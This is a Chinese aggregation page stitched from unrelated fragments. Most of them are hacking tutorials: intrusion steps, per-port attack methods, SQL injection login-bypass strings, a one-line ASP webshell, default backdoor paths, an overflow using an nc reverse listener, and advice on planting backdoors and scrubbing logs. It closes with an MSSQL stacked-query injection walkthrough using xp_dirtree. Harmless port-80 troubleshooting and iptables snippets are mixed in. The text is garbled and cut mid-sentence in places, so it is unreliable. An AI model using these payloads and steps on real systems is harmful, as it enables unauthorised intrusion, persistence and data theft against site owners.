着手于80端口入侵的步骤

合集下载

入侵的基本步骤(精)

入侵的基本步骤(精)

黑客攻击的基本步骤不要步骤化,只是提供基本思路!在实践中,观察,分析,灵活,这样才可能成功。

被条条框框限制住,很难成功的。

黑客攻击的基本步骤:搜集信息实施入侵上传程序、下载数据利用一些方法来保持访问,如后门、特洛伊木马隐藏踪迹信息搜集在攻击者对特定的网络资源进行攻击以前,他们需要了解将要攻击的环境,这需要搜集汇总各种与目标系统相关的信息,包括机器数目、类型、操作系统等等。

踩点和扫描的目的都是进行信息的搜集。

攻击者搜集目标信息一般采用7个基本步骤,每一步均有可利用的工具,攻击者使用它们得到攻击目标所需要的信息。

找到初始信息找到网络的地址范围找到活动的机器找到开放端口和入口点弄清操作系统弄清每个端口运行的是哪种服务画出网络图1. 找到初始信息攻击者危害一台机器需要有初始信息,比方一个IP地址或一个域名。

实际上获取域名是很容易的一件事,然后攻击者会根据已知的域名搜集关于这个站点的信息。

比方服务器的IP地址〔不幸的是服务器通常使用静态的IP地址〕或者这个站点的工作人员,这些都能够帮助发起一次成功的攻击。

搜集初始信息的一些方法包括:开放来源信息〔open source information〕在一些情况下,公司会在不知不觉中泄露了大量信息。

公司认为是一般公开的以及能争取客户的信息,都能为攻击者利用。

这种信息一般被称为开放来源信息。

开放的来源是关于公司或者它的合作伙伴的一般、公开的信息,任何人能够得到。

这意味着存取或者分析这种信息比较容易,并且没有犯罪的因素,是很合法的。

这里列出几种获取信息的例子:公司新闻信息:如某公司为展示其技术的先进性和能为客户提供最好的监控能力、容错能力、服务速度,往往会不经意间泄露了系统的操作平台、交换机型号、及基本的线路连接。

公司职工信息:大多数公司网站上附有地址簿,在上面不仅能发现CEO和财务总监,也可能知道公司的VP和主管是谁。

新闻组:现在越来越多的技术人员使用新闻组、论坛来帮助解决公司的问题,攻击者看这些要求并把他们与电子信箱中的公司名匹配,这样就能提供一些有用的信息。

图解网络入侵的过程

图解网络入侵的过程

图解网络入侵的过程图解网络入侵的过程引言经济社会的发展要求各用户之间的通信和资源共享,需要将一批计算机连成网络,这样就隐含着很大的风险,包含了极大的脆弱性和复杂性,特别是对当今最大的网络——国际互联网,很容易遭到别有用心者的恶意攻击和破坏。

随着国民经济的信息化程度的提高,有关的大量情报和商务信息都高度集中地存放在计算机中,随着网络应用范围的扩大,信息的泄露问题也变得日益严重,因此,计算机网络的安全性问题就越来越重要。

本文主要是写了网络上几种入侵的过程一、简单的"黑客"入侵TCP/IP协议顺序号预测攻击是最简单的"黑客"入侵,也是系统安全的最大威胁。

在网络上,每台计算机有惟一的IP地址,计算机把目标IP地址和一个惟一的顺序号加载于传输的每一个数据包上。

在一个TCP连接中,接收机只收到具有正确IP地址和顺序号的那个包裹。

许多安全设备,如路由器,只允许有一定IP地址的计算机收发传送。

TCP/IP 顺序号预测入侵将使用网络给计算机赋址的方式和包裹交换的顺序来企图访问网络。

一般来说,"黑客"进行TCP/IP 顺序号预测攻击分两步:第一,得到服务器的IP地址。

黑客一般通过网上报文嗅探,顺序测试号码,由WEB浏览器连接到结点上并在状态栏中寻找结点的IP地址。

因为黑客知道其他计算机有一个与服务器IP地址部分公用的IP地址,他便尽力模拟一个能让其通过路由器和作为网络用户访问系统的IP号码。

例如,如果系统的IP 地址为192.0.0.15,黑客便知有近256台计算机可以连入一个C级网,并猜出所有最后位在序列中出现过的地址号码。

IP 地址指示了一个网络连接的计算机数,同时上述地址的高字节中两个最重要的位设定指出了该网为C级网,下图显示了黑客是怎祥预测C级网的IP号码的。

"黑客"用服务器的IP地址来猜测其他网络地址第二,黑客在试过网上IP地址之后,便开始监视网下传送包的序列号,然后,黑客将试图推测服务器能产生的下一个序列号,再将自己有效地插入服务器和用户之间。

黑网站的一般入侵步骤

黑网站的一般入侵步骤

黑网站的一般入侵步骤首先,观察指定网站。

黑网站的入侵指定网站是需要条件的:要先观察这个网站是动态还是静态的。

首先介绍下什么样站点可以入侵:我认为必须是动态的网站如ASP、PHP、 JSP等代码编写的站点如果是静态的(.htm或html),一般是不会成功的。

如果要入侵的目标网站是动态的,就可以利用动态网站的漏洞进行入侵。

Quote:以下是入侵网站常用方法:1.上传漏洞如果看到:选择你要上传的文件[重新上传]或者出现“请登陆后使用”,80%就有漏洞了!有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.2.注入漏洞字符过滤不严造成的3.暴库:把二级目录中间的/换成%5c4.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。

我收集了一下。

类似的还有:’or’’=’" or "a"="a ’) or (’a’=’a") or ("a"="a or 1=1-- ’ or ’a’=’a5.社会工程学。

这个我们都知道吧。

就是猜解。

6.写入ASP格式数据库。

就是一句话木马〈%execute request("value")%〉(数据库必需得是ASP或ASA的后缀)7.源码利用:一些网站用的都是网上下载的源码.有的站长很懒.什么也不改.比如:默认数据库,默认后台地址,默认管理员帐号密码等8.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL./Databackup/dvbbs7.MDB/bbs/Databackup/dvbbs7.MDB/bbs/Data/dvbbs7.MDB/data/dvbbs7.mdb/bbs/diy.asp/diy.asp/bbs/cmd.asp/bbs/cmd.exe/bbs/s-u.exe/bbs/servu.exe工具:网站猎手挖掘鸡明小子9.查看目录法:一些网站可以断开目录,可以访问目录。

入侵内网一般过程

入侵内网一般过程

渗透国内某知名公司内部局域网经过来源:未知时间:2009-08-0613:25编辑:菇在江湖本文的目标是一国内知名公司的网络,本文图片、文字都经过处理,均为伪造,如有雷同,纯属巧合。

最近一个网友要我帮他拿他们公司内网一项重要的文件,公司网络信息朋友都mail给我了,这些信息主要是几张网络拓扑图以及在内网嗅探到的信息(包括朋友所在的子网的设备用户名及密码等信息……)。

参照以上信息总体整理了一下入侵的思路,如果在朋友机器安装木马,从内部连接我得到一个CMD Shell,须要精心伪装一些信息还有可能给朋友带来麻烦,所以选择在该网络的网站为突破口,而且管理员不会认为有“内鬼”的存在。

用代理上肉鸡,整体扫描了一下他的网站,只开了80端口,没扫描出来什么有用的信息,就算有也被外层设备把信息过滤掉了,网站很大整体是静态的网页,搜索一下,查看源文件->查找->.asp。

很快找到一个类似http://www.*****.com/news/show1.asp?NewsId=125272页面,在后面加上and1=1 、and1=2前者正常,后者反回如下错误。

Microsoft OLE DB Provider for ODBC Driver error'80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character sting”./news/show/show1.asp,行59是IIS+MSSQL+ASP的站,在来提交:http://www.*****.com/news/show1.asp?NewsId=125272and 1=(selectis_srvrolemember('sysadmin'))http://www.*****.com/news/show1.asp?NewsId=125272and 'sa'=(select system_user)结果全部正常,正常是说明是当前连接的账号是以最高权限的SA运行的,看一下经典的“sp_cmdshell”扩展存储是否存在,如果存在那就是初战告捷。

入侵个人主机网络攻击的步骤

入侵个人主机网络攻击的步骤

入侵个人主机网络攻击的步骤第一步:隐藏自已的位置为了不在目的主机上留下自己的IP地址,防止被目的主机发现,老练的攻击者都会尽量通过“跳板”或“肉鸡”展开攻击。

所谓“肉鸡”通常是指,HACK实现通过后门程序控制的傀儡主机,通过“肉鸡”开展的扫描及攻击,即便被发现也由于现场遗留环境的IP地址是“肉鸡”的地址而很难追查。

第二步:寻找目标主机并分析目标主机攻击者首先要寻找目标主机并分析目标主机。

在Internet上能真正标识主机的是IP地址,域名是为了便于记忆主机的IP地址而另起的名字,只要利用域名和IP地址就可以顺利地找到目标主机。

当然,知道了要攻击目标的位置还是远远不够的,还必须将主机的操作系统类型及其所提供服务等资料作个全面的了解。

此时,攻击者们会使用一些扫描器工具,以试图获取目标主机运行的是哪种操作系统的哪个版本,系统有哪些帐户,开启了哪些服务,以及服务程序的版本等资料,为入侵作好充分的准备。

第三步:获取帐号和密码,登录主机攻击者要想入侵一台主机,首先要有该主机的一个帐号和密码,否则连登录都无法进行。

这样常迫使他们先设法盗窃帐户文件,进行破解,从中获取某用户的帐户和口令,再寻觅合适时机以此身份进入主机。

当然,利用某些工具或系统漏洞登录主机也是攻击者常用的一种技法。

第四步:获得控制权攻击者们利用各种工具或系统漏洞进入目标主机系统获得控制权之后,就会做两件事:清除记录和留下后门。

他会更改某些系统设置、在系统中置入特洛伊木马或其他一些远程操纵程序,以便日后可以不被觉察地再次进入系统。

此外,为了避免目标主机发现,清除日志、删除拷贝的文件等手段来隐藏自己的踪迹之后,攻击者就开始下一步的行动。

第五步:窃取网络资源和特权攻击者找到攻击目标后,会继续下一步的攻击。

如:下载敏感信息;窃取帐号密码、个人资料等。

三、网络攻击的原理和手法1、从扫描开始扫描往往是攻击的前奏,通过扫描,搜集目标主机的相关信息,以期寻找目标主机的漏洞。

不同端口的入侵方法

不同端口的入侵方法
21端口:
21端口是默认的FTP端口,利用方式:弱口令探测/溢出
目前我还没看到远程溢出的,SERU的本地溢出漏洞风靡一时,曾经很多SSH远程登录协议,利用方式:弱口令探测
23端口
23端口是TLENET的默认端口,利用方式:弱口令探测/溢出
135端口
135端口提供查询服务。利用方式:IPC$(Internet Process Connection)入侵。
网上教程非常多,不多说了。
137端口
137端口统共NetBIOS 数据报(UDP)服务。
139端口
139端口提供共享资源服务(NetBios-SSN),用在IPC$入侵中。上面这三个端口可以综合利用。
端口:7
服务:Echo
说明:能看到许多人搜索Fraggle放大器时,发送到X.X.X.0和X.X.X.255的信息。
端口:19
服务:Character Generator
说明:这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。
端口:80
服务:HTTP
说明:用于网页浏览。木马Executor开放此端口。
端口:99
服务:metagram Relay
说明:后门程序ncx99开放此端口。
端口:102
服务:Message transfer agent(MTA)-X.400 over TCP/IP

电脑80端口被占用是什么原因.doc

电脑80端口被占用是什么原因.doc

电脑80端口被占用是什么原因笔记本80端口被程序进程占用的处理方法1、运行中输入cmd;2、在命令行中输入netstat -ano,得到端口号对应的PID;3、打开任务管理器,点击查看菜单,选择选择列,给进程列表中添加PID列,然后找到PID对应的进程就可以了。

相关阅读:出现问题的常见的几种情况:1、卸载internet信息服务--万维网服务。

这个是最常见的故障,或者其他一些第三方的服务器软件,必须在进程里面结束,才有效果。

2、迅雷等程序或者一些其他有上传功能的软件都会占用电脑的80端口3、netstat -abno后查看,经过查找为pid=4的system进程,因为是系统进程,也无法结束它,经查SQL Server ReportingServices (SQLEXPRESS) 服务占用80端口,停止SQL Server ReportingServices后APache正常启动.备注:杀掉进程的命令:taskkill /pid 4 /f 其中/f 表示强制关闭该进程首先介绍一种网上普遍的方法,就是查找占据80端口的进程,然后关闭它就行了。

1、运行cmd,然后输入netstat -ano,回车;2、查看开头几行包含0.0.0.0:80的那一行最后的pid,为几个数字,把这几个数字记下来;3、启动任务管理器进程,在工具栏选择列前面的框里打上勾;4、然后找到与刚才那个pid对应的是哪个程序,很容易就会找到,就是它与0.0.0.0:80进行了绑定(bind);结束这个进程,再点击Apache的Start按钮,终于出现了那个Running 。

上述的办法可能WIN7I行不通,接下来是另外一种办法Win7的80端口默认是被System进程占用的。

用如下方法可以解决System进程占用80端口的问题:打开RegEdit:开始-运行-输入regedit-调出注册表找到HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServic esHTTP找到一个DWORD值Start,将其改为0重启电脑,System进程将不会占用80端口查询:查看占用80端口的信息,那么可以在cmd窗口输入netstat -ano | findstr 80 命令由于80端口是上网协议中最常用的协议,所以经常造成80端口被占用。

入侵常识

入侵常识

首先你得有个ASP木马,最好是免杀的。要不一传上去就直接给查杀了。
然后用工具 明小子 或阿D 等注入工具。找一下他的上传漏洞,或者找注入点,并破解他的后台管理员和密码。最后登录上去传你的ASP木马。
当你上传成功ASP木马后,然后用网页浏览你的ASP木马路径,如果显示你的马,那就说明你成功拿到他的WEBSHELL了。也就是可以通过ASP木马完全可以浏览他的磁盘文件了(包括他的主页文件)。
address:XXX.XXX.XXX.XXX
然后输入server 显示出来的IP就总 服务器的地址了。
第2种:确定对方的系统,和服务版本。ping一般都不管用了,很少有傻B管理员连放火墙都不装的。首先看看对方有无开21和23 ,开了23就在cmd下输入
其实,在英文原意里,“Hacker(黑客)”最初的意思是指一类计算机高手,这类人有喜欢研究系统漏洞的嗜好,他们并不入侵别人系统;而真正入侵别人系统的人被叫作“Cracker(怪客)”。
其实会入侵网站的“黑客”没什么了不起,真正厉害的是背后那些找出系统漏洞的“黑客”。这就好像会利用游戏密技破关的人其实并不怎么厉害,真正从无到有,找出游戏隐藏秘密的人才叫高手。可是对于从未接触过游戏的人来说,他其实分不出“使用密技”与“找出密技”的差别,他只要看到有人会破关就觉得很厉害,而这也是大多数不了解“黑客”与“怪客”差异的人,就会认为他们两者都是高手。这些所谓能入侵的黑客,真的没你想像中这么“神奇”,别被电影的情节给骗了!不过,既然大家早已“黑、怪”不分,那我们就把他们都叫作黑客吧!
从上面可以看出我给192.168.1.1发50个数据包。返回了48个,其中有两个丢失,返回速度最快为40ms,最慢为51ms,平均速度为46ms.TTL为128是NT系统。

安装apache时80端口被占用的解决方案(Windows)

安装apache时80端口被占用的解决方案(Windows)

使用APMServ5.2.0,的时候,又重新启动了IIS
把IIS 端口改成了8080,但是又出现80端口被占用的问题,所以总结一个原因就是
如果用APMServ5.2.0 虚拟主机多站点的时候,IIS是不能启动的,因为以前没有使用虚拟主机的时候,IIS和APMServ
可以共用
安装apache时80端口被占用的解决方案(Windows)
如果80端口被占用,安装Apache的过程中,可能不能成功安装Apache的Servcie。如果不能正确安装Apache Service,那么执行Start或Restart等命令时,会报如“找不到Apache2的Service”的错误,然后执行失败。这样的话,修改了httpd.conf文件,将端口改为其它值(如8088)也无法正确启动Apache服务。
如果80端口被占用,安装Apache的过程中,可能不能成功安装Apache的Servcie。如果 不能正确安装Apache Service,那么执行Start或Restart等命令时,会报如“找不到Apache2的Service”的错误,然后执行失败。这样的话,修改了 httpd.conf文件,将端口改为其它值(如8088)也无法正确启动Apache服务。
二、修改httpd.conf,将端口改为其它未被占用的端口号;
三、重新运行Apache安装文件,选择修复功能执行。
当然,这里还有一种有效的办法,不仅可以不用更改默认的端口号,还能找到抢占端口的“凶手”是谁。链接:
一、开始->运行->cmd,输入netstat -o -an;
下面介绍一下我的处理方法:
1、通过netstat命令查找占用80端口的进程的pid: 以下为引用的内容:

入侵步骤和思路

入侵步骤和思路

第一步:进入系统1. 扫描目标主机。

2. 检查开放的端口,获得服务软件及版本。

3. 检查服务软件是否存在漏洞,如果是,利用该漏洞远程进入系统;否则进入下一步。

4. 检查服务软件的附属程序(*1)是否存在漏洞,如果是,利用该漏洞远程进入系统;否则进入下一步。

5. 检查服务软件是否存在脆弱帐号或密码,如果是,利用该帐号或密码系统;否则进入下一步。

6. 利用服务软件是否可以获取有效帐号或密码,如果是,利用该帐号或密码进入系统;否则进入下一步。

7. 服务软件是否泄露系统敏感信息,如果是,检查能否利用;否则进入下一步。

8. 扫描相同子网主机,重复以上步骤,直到进入目标主机或放弃。

第二步:提升权限1. 检查目标主机上的SUID和GUID程序是否存在漏洞,如果是,利用该漏洞提升权限,否则进入下一步。

2. 检查本地服务是否存在漏洞,如果是,利用该漏洞提升权限,否则进入下一步。

3. 检查本地服务是否存在脆弱帐号或密码,如果是,利用该帐号或密码提升权限;否则进入下一步。

4. 检查重要文件的权限是否设置错误,如果是,利用该漏洞提升权限,否则进入下一步。

5. 检查配置目录(*2)中是否存在敏感信息可以利用。

6. 检查用户目录中是否存在敏感信息可以利用。

7. 检查临时文件目录(*3)是否存在漏洞可以利用。

8. 检查其它目录(*4)是否存在可以利用的敏感信息。

9. 重复以上步骤,直到获得root权限或放弃。

第三步:放置后门最好自己写后门程序,用别人的程序总是相对容易被发现。

第四步:清理日志最好手工修改日志,不要全部删除,也不好使用别人写的工具。

附加说明:*1 例如WWW服务的附属程序就包括CGI程序等*2 这里指存在配置文件的目录,如/etc等*3 如/tmp等,这里的漏洞主要指条件竞争*4 如WWW目录,数据文件目录等/*****************************************************************************/ 好了,大家都知道了入侵者入侵一般步骤及思路那么我们开始做入侵检测了。

Linux中在防火墙中开启80端口方法是什么

Linux中在防火墙中开启80端口方法是什么

Linux中在防火墙中开启80端口方法是什么防火墙借由监测所有的封包并找出不符规则的内容,可以防范电脑蠕虫或是木马程序的快速蔓延。

这篇文章主要介绍了Linux中在防火墙中开启80端口方法示例,具有一定参考价值,需要的朋友可以了解下。

方法步骤linux如果刚安装好防火墙时我们常用的端口是没有增加的,也就是说不能访问,那么要怎么把常用端口增加到防火墙通过状态呢,下面我们以80端口为例子吧。

最近自己在学习Linux。

搭建一个LNMP环境。

在测试时一切都好。

然后重启Linux后。

再次访问网站无法打开。

最终原因是在防火墙中没有加入 80 端口的规则。

具体方法如下:在CentOS下配置iptables防火墙,是非常必要的。

来我们学习如何配置!,其它版本一下:1.打开iptables的配置文件:代码如下vi /etc/sysconfig/iptables通过/etc/init.d/iptables status命令查询是否有打开80端口,如果没有可通过两种方式处理:1.修改vi /etc/sysconfig/iptables命令添加使防火墙开放80端口代码如下-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 80 -j ACCEPT2.关闭/开启/重启防火墙代码如下/etc/init.d/iptables stop#start 开启#restart 重启添加好之后防火墙规则如下所示:代码如下# Firewall configuration written by system-config-firewall# Manual customization of this file is not recommended.*filter:INPUT ACCEPT [0:0]:FORWARD ACCEPT [0:0]:OUTPUT ACCEPT [0:0]-A INPUT -m state –state ESTABLISHED,RELATED -j ACCEPT -A INPUT -p icmp -j ACCEPT-A INPUT -i lo -j ACCEPT-A INPUT -m state –state NEW -m tcp -p tcp –dport 22 -j ACCEPT-A INPUT -m state –state NEW -m tcp -p tcp –dport 80 -j ACCEPT-A INPUT -m state –state NEW -m tcp -p tcp –dport 3306 -j ACCEPT-A INPUT -j REJECT –reject-with icmp-host-prohibited-A FORWARD -j REJECT –reject-with icmp-host-prohibited COMMIT/etc/init.d/iptables restart补充,有些朋友喜欢这样做代码如下vi /etc/sysconfig/iptables-A INPUT -m state –state NEW -m tcp -p tcp –dport 80 -j ACCEPT(允许80端口通过防火墙)-A INPUT -m state –state NEW -m tcp -p tcp –dport 3306 -j ACCEPT(允许3306端口通过防火墙)按照这种方法测试,发现重启防火墙的时候,回报这两行错误。

各个端口的入侵方法(入侵菜鸟必看)

各个端口的入侵方法(入侵菜鸟必看)

各个端口的入侵方法(入侵菜鸟必看)1. 1433端口入侵scanport.exe 查有1433的机器SQLScanPass.exe 进行字典暴破(字典是关键)最后SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口(以上反向的,测试成功)sqlhelloz.exe 入侵ip 1433 (这个是正向连接)2. 4899端口入侵用4899过滤器.exe,扫描空口令的机器3. 3899的入侵对很早的机器,可以试试3389的溢出(win3389ex.exe)对2000的机器,可以试试字典暴破。

(tscrack.exe)4. 80入侵对sp3以前的机器,可以用webdav入侵;对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)可以利用SQL进行注入。

(小榕的注入软件)。

5. serv-u入侵(21端口)对5. 004及以下系统,可用溢出入侵。

(serv5004.exe)对5.1.0.0及以下系统,可用本地提升权限。

(servlocal.exe)======================================对serv-u的MD5加密密码,可以用字典暴破。

(crack.vbs)输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。

如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A6. 554端口用real554.exe入侵。

7. 6129端口用DameWare6129.exe入侵。

8. 系统漏洞利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。

9. 3127等端口可以利用doom病毒开的端口,用nodoom.exe入侵。

非常适合新手的注入和溢出教程

非常适合新手的注入和溢出教程
反响连接
nc -l -p 本机端口
3.dcomrpc 溢出
漏洞利用 dcomrpc -d 目标主机ip [ortions] 有提示
[ortions] -l 6668 绑定6668端口在6668端口溢出
4.rpc long 文件名溢出
此漏洞可以通过 135(tcp/ip) 139 445 593 端口发起攻击
用这个就不错了
现在我在把常见的端口所对应的服务给大家列出来!!我觉得了解一下还是很重要的~~
80 全球信息网超文本传输协议(www)
110 pop3 服务器(邮箱发送服务器)
135 (tcp/ip) 查询服务 dns
139 共享资源端口(netbios-ssn)
and 1=(select count(*) from admin where len(password)>15) 错误
当然还有其他方面的漏洞ms04 ms05 ,代理,输入法的漏洞....只要找到相应的工具将他溢出就可以了
以上的漏洞当然在实际电脑中很难找到了,我讲的只是漏洞利用的方法!!至于上面的漏洞怎么修复,大部分只要不断的升级打补丁就可以了~~
至于溢出之后怎么办就*大家发挥了~~~~
*********好了现在我说下注入********
and 1=(select count(*) from admin where len(name)>2) 正确
and 1=(select count(*) from admin where len(name)>6) 错误
and 1=(select count(*) from admin where len(name)>5) 正确

8080端口

8080端口

利用8080端口入侵
声明:原创文章,转载请指名来自华夏黑客联盟(),违者必究!
作者:245661320
今天看见老大的的悬赏太诱人了,所以今天发威下,多发原创,大家也努力呀,现在YB满天飞,现
在不抢何时抢,好了我也不废话了,进入正题。

这篇文章讲的是8080端口入侵,工具有8080端口捉服务器工具,这个我就不打包了,有病毒,我在
服务器上操作的。

首先设置要扫描的IP段
然后进行扫描。

扫描后点击IP整理,把扫描的IP导入弹出的TXT记事本中,保存后点击任意键后自动整理。

然后点击Apache Tomcat.exe进行筛选。

筛选完毕,成功破解两台。

然后点击报告。

出现扫描结果。

进行连接
这样就OK了好了就到这吧。

80端口、512端口、3389端口……入侵实例

80端口、512端口、3389端口……入侵实例

80端⼝、512端⼝、3389端⼝……⼊侵实例有很多⽹站为了安全起见,在WEB Server前⾯架了防⽕墙,或者做了TCP/IP过滤,对外只开放TCP 80端⼝。

从⼊侵者⾓度来看,要⼊侵那么从80上跑的CGI⼊⼿是⽐较可⾏的,当然也可以⽤别的办法,例如旁敲侧击,呵呵。

从⽹管⾓度来看,⼀是要保证CGI的安全性,另外⽹络的整体安全性也是很重要的。

针对基于80端⼝⼊侵、防范⽽出的CGI扫描器数不胜数,但基本上原理都⼀样。

CGI扫描器原理说起来其实⾮常简单,可以⽤四句话来概括:连接⽬标WEB SERVER;发送⼀个特殊的请求;接收⽬标服务器返回数据;根据返回数据判断⽬标服务器是否有此CGI漏洞。

当管理的服务器达到⼀定数量的时候,⼿⼯检测⾃⼰的服务器是否存在各种各样的CGI漏洞,那就太消耗时间和精⼒了,所以⼀个⽹管⼿上有个⽐较好⽤的CGI漏洞扫描器还是必要的。

OK!今天我们就⾃⼰来动⼿⽤C写⼀个简单的CGI扫描器,帮助⾃⼰在⽇常⼯作中检测服务器:)) 源代码如下,很多地⽅我都加了注释,别嫌我烦哦:))编译好的程序可以从/program/cgicheck.exe 下载。

/************************************************************************* Module:CGICheck.cpp Author:ey4s Date:2001/5/16说明:这是⼀个Console下多线程,带有进度显⽰的CGI扫描器的模板,更改⼀下szSign和SendBuff就可以扫描其他CGI漏洞,设置了连接、发送、接收超时,速度还可以哦。

希望可以帮助到admins检测⾃⼰的服务器:)) *************************************************************************/ #i nclude #define iPort 80//⽬标Web Server端⼝#define szSign “500 13rnServer: Microsoft-IIS/5.0”//根据此标志来检查⽬标是否有漏洞 #pragma comment(lib,“ws2_32.lib”) /////////////////////////////////////////////////////////////////////////// // //定义&初始化全局变量// char *SendBuff=“GET /NULL.printern”,//发送的请求buff CurrentTarget[52]=,//存放最后⼀个线程将扫描的⽬标turn[4][2]=;//显⽰进度时的字符intSendBuffLen=strlen(SendBuff),//发送的buff长度iConnTimeout,//TCP Connect TimeOut ii=0,//扫描进度iTotal;//服务器总数HANDLE hSemaphore=NULL,//信标内核对象句柄,⽤来控制线程数量hStdout;//console标准输出句柄,做进度显⽰的时候⽤的struct timeval timeout;//连接、发送和接收的超时值DWORD SleepTime;//每个⼀个线程后等待的时间/* SleepTime值根据⽤户输⼊的线程数量[ThreadNum]和TCP ConnectTimeOut[CONNTIMEO]来计算。

第13天 80端口攻击总结

第13天 80端口攻击总结

今天我们来说说80端口的攻击方法,只是把大概的说一下,肯定有遗漏了.我将描述每种攻击的作用,和其怎样利用这些漏洞进行攻击(注意host的意思你应该懂吧)(1)'.' '..' 和 '...' 请求这些攻击痕迹是非常普遍的用于web应用程序和web服务器,它用于允许攻击者或者蠕虫病毒程序改变web服务器的路径,获得访问非公开的区域。

大多数的CGI程序漏洞含有这些'..'请求。

Example:http://host/cgi-bin/lame.cgi?file=../../../../etc/motd这个列子展示了攻击者请求mosd这个文件,如果攻击者有能力突破web服务器根目录,那么可以获得更多的信息,并进一步的获得特权。

(2)'%20' 请求%20是表示空格的16进制数值,虽然这个并不代表你能够利用什么,但是在你浏览日志的时候会发现它,一些web服务器上运行的应用程序中这个字符可能会被有效的执行,所以,你应该仔细的查看日志。

另一方面,这个请求有时可以帮助执行一些命令。

Example:http://host/cgi-bin/lame.cgi?page=ls%20-al|这个列子展示了攻击者执行了一个unix的命令,列出请求的整个目录的文件,导致攻击者访问你系统中重要的文件,帮助他进一步取得特权提供条件。

(3)'%00' 请求%00表示16进制的空字节,他能够用于愚弄web应用程序,并请求不同类型的文件。

Examples:http://host/cgi-bin/lame.cgi?page=index.html这可能是个有效的请求在这个机子上,如果攻击者注意到这个请求动作成功,他会进一步寻找这个cgi程序的问题。

http://host/cgi-bin/lame.cgi?page=../../../../etc/motd也许这个cgi程序不接受这个请求,原因在于它要检查这个请求文件的后缀名,如:html.shtml或者其他类型的文件。

80端口被占用的解决

80端口被占用的解决

80端口被占用的解决几乎每一个网页设计师在做网站测试的时候,都会遇到过80端口被占用的情况!我从会做网站到现在也遇到过了N次了,今天又让我遇到了,我来解决他,并为大家做最详细易懂的分析。

我的情况:我用了一个小插件“黑风Aspweb服务器”代替IIS,尽管如此IIS组件也是要装的。

停止IIS中的“默认网站“,意味着停止了80端口的运行,然后打开“黑风Aspweb服务器”即可正常测试网站。

故障现象:今天“默认网站“已经停止,但是打开“黑风Aspweb服务器”还是提示“80端口被占用”。

解决过程:打开命令提示符——netstat -ano,就可以查看本机端口开放情况与对应的程序。

如下图:图中,可以看出,21、25以及80端口都被PID(进程标识符)为:5668的进程所占用。

现在,只要知道PID 为5668的进程就可以解决了。

2、打开任务管理器,如下图:图中,可以看出PID:5668对应的进程为inetinfo.exe。

(稍后解释inetinfo.exe进程)最后操作:结束该进程,重启或停止IIS“默认网站”,不论如何inetinfo.exe都会自动重新运行,然后,再停止IIS“默认网站”,运行“黑风Aspweb服务器”,即可解决。

注:进程PID是可以变化的,就是说不同时间运行同一个程序,他的PID号就不同。

不同计算机同一个进程的PID号多数情况也是不同的。

因此,在结束inetinfo.exe之前的PID是一个三位数,重新启动后,它的PID 可能为四位数了。

这点不影响问题的解决,我只是好奇,便拿出来说罢了。

=====================inetinfo.exe:正常情况下,inetinfo.exe主要用于支持微软Windows IIS网络服务的除错。

这个程序对你系统的正常运行是非常重要的。

属于系统组件,不要删除!他对应的系统服务是IIS admin Service 或world wide web publishing service 。

虚拟局域网怎么穿透80端口

虚拟局域网怎么穿透80端口

虚拟局域网怎么穿透80端口
由于众所周知的原因,网站80端口被封了,怎么办,其实使用nat123端口映射穿透80发布网站可以做网站服务,下面是店铺给大家整理的一些有关虚拟局域网穿透80端口的方法,希望对大家有帮助! 虚拟局域网穿透80端口的方法
1、确认有.NET4.0运行环境。

nat123端口映射启动nat123端口映射,添加映射。

内网地址:网站应用主机IP或计算机
内网端口:8000或其他实际端口
外网地址:自己的网站域名
外网端口:80
添加映射后,查看映射图标状态,如状态正常表示映射成功。

映射后,再访问下你的外网地址,访问网站正常。

在内网部署一个WEB网站。

在内网上可用内网地址或本地地址可以正常打开访问。

内网网站应用端口可以非80端口。

这时,外网地址是访问不了网站80端口的。

添加WEB网站应用端口映射,并启动映射。

注意对应好内网地址和需要访问的外网地址80端口即可。

即使没有域名也没关系,按提示自定义外网访问域名地址。

如果映射外网地址是自己的域名网站,需要将域名的别名指向提示的cname地址,或配置IP指向解析,给映射服务解析。

自动启动映射后WEB网站发布。

外网地址80端口可以访问网站。

END。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

着手于80端口入侵的步骤第一种方法:利用sqlserver的xp_dirtree,好的我们先来将一下方法,然后再说其优劣处(在原文的基础上作了点补充)建立表语句:/down/list.asp?id=1;create table dirs(paths varchar(1000))-- 返回:正常的信息!说明建表成功!继续!(建的比原文的大一点,因为我遇过名子很长的文件,删除了那个id,因为没有什么用语句:/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree ’c:\’--返回:正常信息。

说明写入C盘的所有目录成功了!爽!接下来就是取表了!暴它出来。

(好像只有暴这种方法了)语句:/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-返回:Microsoft OLE DB Provider for SQL Server 错误80040e07将varchar 值’@Inetpub’转换为数据类型为int 的列时发生语法错误。

再依次爆出表中的目录名称!语句:http:///down/list.asp?id=1 and 0<>(select top 1 paths fromdirs where paths not in( ’@Inetpub’))--返回:Microsoft OLE DB Provider for SQL Server 错误80040e07将varchar 值’test’转换为数据类型为int 的列时发生语法错误。

